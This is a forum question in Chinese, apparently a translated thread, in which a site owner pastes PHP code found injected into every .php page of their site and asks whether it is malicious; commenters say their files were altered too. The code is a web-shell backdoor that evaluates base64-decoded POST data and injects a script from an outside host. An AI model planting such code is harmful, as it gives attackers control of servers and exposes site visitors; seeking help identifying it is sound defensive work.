有人請告知這個PHP代碼會做什麼?我有PHP只在每個.php頁面上找到這個代碼,其他頁面像js/css/php.ini他們很好..是這個惡意代碼?如果是,請建議如何預防它們?這個php腳本會做什麼?是惡意的PHP代碼?
下面是代碼,
global $sessdt_o;
if(!$sessdt_o) {
$sessdt_o = 1;
$sessdt_k = "lb11";
if([email protected]$_COOKIE[$sessdt_k]) {
$sessdt_f = "102";
if([email protected]_sent()) {
@setcookie($sessdt_k,$sessdt_f);
} else {
echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>";
}
} else {
if($_COOKIE[$sessdt_k]=="102") {
$sessdt_f = (rand(1000,9000)+1);
if([email protected]_sent()) {
@setcookie($sessdt_k,$sessdt_f);
} else {
echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>";
}
$sessdt_j = @$_SERVER["HTTP_HOST"][email protected]$_SERVER["REQUEST_URI"];
$sessdt_v = urlencode(strrev($sessdt_j));
$sessdt_u = "http://vekra.ee/?rnd=".$sessdt_f.substr($sessdt_v,-200);
echo "<script src='$sessdt_u'></script>";
echo "<meta http-equiv='refresh' content='0;url=http://$sessdt_j'><!--";
}
}
$sessdt_p = "showimg";
if(isset($_POST[$sessdt_p])){
eval(base64_decode(str_replace(chr(32),chr(43),$_POST[$sessdt_p])));
exit;
}
}
你是如何得到這段代碼的?你的PHP文件在你不知情的情況下被修改過 – Ali
嗨阿里,我只是打開FileZila FTP,然後發現每個PHP頁面上次修改時間爲2011年9月14日上午4時01分14秒(印度時間),然後我打開文件,並找到此代碼。它真的很奇怪。 – DBTutor
我的網站也得到了這個文件... – Pinch